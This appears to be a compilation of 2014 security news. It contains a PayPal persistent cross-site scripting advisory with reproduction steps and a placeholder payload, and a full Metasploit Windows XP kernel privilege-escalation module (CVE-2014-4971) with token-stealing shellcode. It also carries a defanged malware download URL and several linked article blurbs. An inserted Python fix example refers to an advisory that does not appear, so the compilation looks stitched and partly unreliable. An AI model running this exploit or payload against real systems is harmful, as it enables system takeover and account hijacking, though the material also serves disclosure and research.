spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified
funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy
(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your
PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary
funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it
charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency
used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account
type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United
States at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale,
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China's bankcard association, to allow Chinese consumers
to use PayPal to shop online. PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
Between December 4 and 9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation
for PayPal's decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation web vulnerability in the PayPal Inc core application api.


Vulnerability Disclosure Timeline:
==================================
2014-10-13: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
PayPal Inc
Product: Core Application 2013 Q2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation web vulnerability has been detected in the official PayPal service application and common service API.
This vulnerability type allows an attacker to inject their own malicious script code into the vulnerable module on the application side (persistent).

The vulnerability is located in the `Tools` section of the `Shipping` module when processing manipulated `ShipFromInfo` values
submitted via a POST request. Remote attackers can inject their own persistent script code, which executes in the context of the ShipFromInfo
parameter in several of the settings listings. The shipping settings redisplay the ShipFromInfo content. The parameter
input is neither parsed nor securely encoded, which results in persistent execution in the next layer of the settings module itself.

The vulnerability is exploitable for a stand-alone user account but also for multi-accounts in PayPal. The exploitation is
remote and the risk is high because of the following scenario: a remote attacker is able to inject the information into the profile
itself and can use the details in an exchange with the manipulated ShipFromInfo, which also results in persistent execution
for the transaction-bound user account (victim|target).

The security risk of the persistent vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 4.1.
Exploitation of the persistent vulnerability requires a low privileged PayPal application user account and only low user interaction.
Successful exploitation of the vulnerability results in persistent session hijacking, persistent phishing, persistent external redirects,
persistent external malware loads via injection and persistent manipulation of the module web context.

Request Method(s):
                        [+] POST

Vulnerable Section(s):
                        [+] Paypal API - (https://www.paypal.com/en)

Vulnerable Module(s):
                        [+] Tools > Shipping

Vulnerable Parameter(s):
                        [+] ShipFromInfo

Affected Module(s):
                        [+] Settings Listing


Proof of Concept (PoC):
=======================
The persistent script code injection web vulnerability can be exploited by remote attackers with a low privileged paypal application user account and
low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.


PoC: Ship From Information

<div style="display: block;" id="ShipToPage" class="SettingsPage">
<h4><em>Ship From Information:</em></h4>
<table style="margin-left: 10px" cellpadding="2" cellspacing="0">
<tbody><tr>
<td colspan="2" id="ShipFromInfo" style="font-weight: bold">">""<[PERSISTENT INJECTED SCRIPT CODE!]
/>>"<[2nd PERSISTENT INJECTED SCRIPT CODE!]><br>5305352131</td>
</tr>
</tbody></table>


Manual exploitation steps to reproduce ...

1.  Register 2 verified or unverified PayPal accounts.
2.  Log in to the first account and go to the shipping information in the tools section.
3.  Open another window and switch to the profile settings where you include the ship-from information.
4.  Include the payload from the PoC section to bypass the filter validation of the API.
Note: Include the payload twice and split the two tags with two %20 sequences!
5.  Switch back to the first page in the tools section under shipping.
6.  Open the separate edit setting button from the index listing.
7.  Go to the first menu point, Ship From Information.
8.  At the top of the listing, the persistent injected script code from the main section will be executed within the context.
9.  #1 Successfully reproduced ...! (Local)
10. Buy or sell an article to a customer and use the ship-from information details as location.
11. After the buyer or seller gets the information of the used shipping details, he can review the ShipFromInfo details.
12. The persistent script code will be executed in the web context of the vulnerable module settings in the shipping details.
13. #2 Successfully reproduced ...! (Remote)


Reference(s):
https://ship.paypal.com/cgi-bin/shipweb?cmd=add-shipping-preset
https://ship.paypal.com/powership/shipping/js/requests/create-shipments-from-file.js?version=1_0_4


Solution - Fix & Patch:
=======================
Parse the output listing page of the settings website to patch the issue.
Encode and filter the ShipFromInfo parameter of the POST request to fix the vulnerability and to prevent persistent script code injection attacks.
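As an added example (not PayPal's code and not part of either advisory), the following Python shows the fix both advisories above call for: the `ShipmentsToImport` CDATA value from the first advisory is parsed, checked against an allowlist, and HTML-escaped before it is reflected in the error message, and the same escaping is applied when the `ShipFromInfo` lines from the second advisory are rendered into the settings listing. The shipment ID format, the account number and the sample requests are constructed assumptions.

```python
# Added example, not PayPal's or Vulnerability Lab's code: server-side
# validation and HTML output encoding for the two advisories above.
import html
import re
import xml.etree.ElementTree as ET

# Constructed request in the shape logged in the first advisory; the
# placeholder from the advisory stands in for injected script code.
PAYLOAD = "<[PERSISTENT INJECTED SCRIPT CODE!]')>"
SAMPLE_REQUEST = f"""<ImportShipments>
<AccountNumber>ACCOUNT-PLACEHOLDER</AccountNumber>
<ImportFromPayPal>true</ImportFromPayPal>
<ImportFromeBay>false</ImportFromeBay>
<ShipmentsToImport><![CDATA[{PAYLOAD}]]></ShipmentsToImport>
</ImportShipments>"""
VALID_REQUEST = SAMPLE_REQUEST.replace(f"<![CDATA[{PAYLOAD}]]>", "ABC123,XYZ789")

# Assumption: shipment references are comma-separated alphanumeric IDs.
SHIPMENT_ID_RE = re.compile(r"^[A-Z0-9]{1,32}$")


def parse_shipments_to_import(xml_text):
    """Return the text of <ShipmentsToImport>. CDATA is transparent to the
    XML parser, so its content arrives as ordinary text and must be treated
    as untrusted input like any other field."""
    root = ET.fromstring(xml_text)
    node = root.find("ShipmentsToImport")
    return "" if node is None or node.text is None else node.text


def validate_shipment_ids(value):
    """Allowlist check; returns the list of IDs or None if anything is off."""
    ids = [part.strip() for part in value.split(",") if part.strip()]
    if not ids or any(SHIPMENT_ID_RE.match(i) is None for i in ids):
        return None
    return ids


def vulnerable_error_html(value):
    """The unsafe pattern from the advisory: the rejected value is reflected
    verbatim into the ErrorGeneralText cell, so markup in it is rendered."""
    return f"Invalid value for: ShipmentsToImport: '{value}' Correct Input"


def hardened_error_html(value):
    """Same message, but the value is HTML-escaped (including quotes) so it
    is displayed as text rather than interpreted as markup."""
    return (
        "Invalid value for: ShipmentsToImport: '"
        + html.escape(value, quote=True)
        + "' Correct Input"
    )


def handle_import(xml_text):
    """Returns (status_code, html_fragment); 4 mirrors the StatusCode the
    advisory's response used for a rejected value."""
    value = parse_shipments_to_import(xml_text)
    ids = validate_shipment_ids(value)
    if ids is None:
        return 4, hardened_error_html(value)
    return 0, f"Imported {len(ids)} shipment(s)"


def render_ship_from_info(lines):
    """Second advisory: the settings listing redisplays the stored
    ShipFromInfo lines, so each line is escaped before being joined with <br>."""
    return "<br>".join(html.escape(line, quote=True) for line in lines)


if __name__ == "__main__":
    print(vulnerable_error_html(PAYLOAD))
    print(handle_import(SAMPLE_REQUEST))
    print(handle_import(VALID_REQUEST))
    print(render_ship_from_info(['">"<[INJECTED]>', "5305352131"]))
```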


Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the shipping application of paypal inc is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) [www.vulnerability-lab.com]



Metasploit: Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/local/windows_kernel'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Exploit::Local::WindowsKernel
  include Msf::Post::File
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation',
      'Description'    => %q{
        A vulnerability within Microsoft Bluetooth Personal Area Networking module,
        BthPan.sys, can allow an attacker to inject memory controlled by the attacker
        into an arbitrary location. This can be used by an attacker to overwrite
        HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
        NtQueryIntervalProfile.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
          'Jay Smith <jsmith[at]korelogic.com>' # MSF module
        ],
      'Arch'          => ARCH_X86,
      'Platform'      => 'win',
      'SessionTypes'  => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Targets'       =>
        [
          ['Windows XP SP3',
           {
             'HaliQuerySystemInfo' => 0x16bba,
             '_KPROCESS'  => "\x44",
             '_TOKEN'     => "\xc8",
             '_UPID'      => "\x84",
             '_APLINKS'   => "\x88"
           }
          ]
        ],
      'References'    =>
        [
          [ 'CVE', '2014-4971' ],
          [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ],
          [ 'OSVDB', '109387' ]
        ],
      'DisclosureDate' => 'Jul 18 2014',
      'DefaultTarget'  => 0
    ))
  end


  def ring0_shellcode
    tokenswap = "\x60\x64\xA1\x24\x01\x00\x00"
    tokenswap << "\x8B\x40\x44\x50\xBB\x04"
    tokenswap << "\x00\x00\x00\x8B\x80\x88"
    tokenswap << "\x00\x00\x00\x2D\x88"
    tokenswap << "\x00\x00\x00\x39\x98\x84"
    tokenswap << "\x00\x00\x00\x75\xED\x8B\xB8\xC8"
    tokenswap << "\x00\x00\x00\x83\xE7\xF8\x58\xBB"
    tokenswap << [session.sys.process.getpid].pack('V')
    tokenswap << "\x8B\x80\x88\x00\x00\x00"
    tokenswap << "\x2D\x88\x00\x00\x00"
    tokenswap << "\x39\x98\x84\x00\x00\x00"
    tokenswap << "\x75\xED\x89\xB8\xC8"
    tokenswap << "\x00\x00\x00\x61\xC3"
  end

  def fill_memory(proc, address, length, content)
    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")

    unless proc.memory.writable?(address)
      vprint_error("Failed to allocate memory")
      return nil
    end
    vprint_good("#{address} is now writable")

    result = proc.memory.write(address, content)

    if result.nil?
      vprint_error("Failed to write contents to memory")
      return nil
    end
    vprint_good("Contents successfully written to 0x#{address.to_s(16)}")

    return address
  end

  def disclose_addresses(t)
    addresses = {}

    hal_dispatch_table = find_haldispatchtable
    return nil if hal_dispatch_table.nil?
    addresses['halDispatchTable'] = hal_dispatch_table
    vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}")

    vprint_status('Getting the hal.dll base address...')
    hal_info = find_sys_base('hal.dll')
    if hal_info.nil?
      vprint_error('Failed to disclose hal.dll base address')
      return nil
    end
    hal_base = hal_info[0]
    vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16)}")

    hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
    addresses['HaliQuerySystemInfo'] = hali_query_system_information

    vprint_good("HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}")
    addresses
  end

  def check
    if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/
      return Exploit::CheckCode::Safe
    end

    os = sysinfo["OS"]
    return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i

    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    return Exploit::CheckCode::Safe unless handle

    session.railgun.kernel32.CloseHandle(handle)

    return Exploit::CheckCode::Vulnerable
  end

  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end

    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
    end

    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    if handle.nil?
      fail_with(Failure::NoTarget, "Unable to open \\\\.\\bthpan device")
    end

    my_target = targets[0]
    print_status("Disclosing the HalDispatchTable address...")
    @addresses = disclose_addresses(my_target)
    if @addresses.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Failed to disclose necessary address for exploitation. Aborting.")
    else
      print_good("Address successfully disclosed.")
    end

    print_status("Storing the shellcode in memory...")
    this_proc = session.sys.process.open
    kernel_shell = ring0_shellcode
    kernel_shell_address = 0x1

    buf = "\x90" * 0x6000
    buf[0, 1028] = "\x50\x00\x00\x00" + "\x90" * 0x400
    buf[0x5000, kernel_shell.length] = kernel_shell

    result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)
    if result.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
    end
    print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")

    print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
    session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses["halDispatchTable"] + 0x4, 0)
    session.railgun.kernel32.CloseHandle(handle)

    print_status("Executing the Kernel Stager through NtQueryIntervalProfile()...")
    session.railgun.ntdll.NtQueryIntervalProfile(2, 4)

    print_status("Checking privileges after exploitation...")

    unless is_system?
      fail_with(Failure::Unknown, "The privilege escalation wasn't successful")
    end
    print_good("Privilege escalation successful!")

    p = payload.encoded
    print_status("Injecting #{p.length} bytes to memory and executing it...")
    unless execute_shellcode(p)
      fail_with(Failure::Unknown, "Error while executing the payload")
    end
  end
end



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Gameover Zeus Accessorizes at Vogue.com

Our researchers this week spotted a Gameover Zeus sample receiving commands to download Zemot from hxxp://media.vogue[dot]com/voguepedia/extensions/dimage/cache/1zX67.exe

more here.........http://www.threattracksecurity.com/it-blog/gameover-zeus-accessorizes-vogue-com/

Attack of the week: POODLE

Believe it or not, there's a new attack on SSL. Yes, I know you're thunderstruck. Let's get a few things out of the way quickly.

First, this is not another Heartbleed. It's bad, but it's not going to destroy the Internet. Also, it applies only to SSLv3, which is (in theory) an obsolete protocol that we all should have ditched a long time ago. Unfortunately, we didn't.

Anyway, enough with the good news. Let's get to the bad.

more here..........http://blog.cryptographyengineering.com/2014/10/attack-of-week-poodle.html

Gmail’s SMTPUTF8 prone to homographic attacks (thanks, 4chan!)

I always loved working with Google.

I have been participating in their program since 2012. Over the years, I addressed some nice vulnerabilities that got me a couple of hall of fame entries and of course some nice monetary awards. But this last time, I drew a blank.

more here............http://ceukelai.re/?p=11

POODLE attacks on SSLv3

My colleague, Bodo Möller, in collaboration with Thai Duong and Krzysztof Kotowicz (also Googlers), just posted details about a padding oracle attack against CBC-mode ciphers in SSLv3. This attack, called POODLE, is similar to the BEAST attack and also allows a network attacker to extract the plaintext of targeted parts of an SSL connection, usually cookie data. Unlike the BEAST attack, it doesn't require such extensive control of the format of the plaintext and thus is more practical.

more here..........https://www.imperialviolet.org/2014/10/14/poodle.html

Userland rootkits: Part 1, IAT hooks

This is the first part of this series about userland rootkits. I wanted to write on it and demonstrate how some rootkits hide files by using IAT hooks.

This post is about a classic trick, known for decades. Malware specialists may know this already, so this is mostly an introduction for those willing to learn the theory of rootkits and see a demonstration.

more here...............http://www.adlice.com/userland-rootkits-part-1-iat-hooks/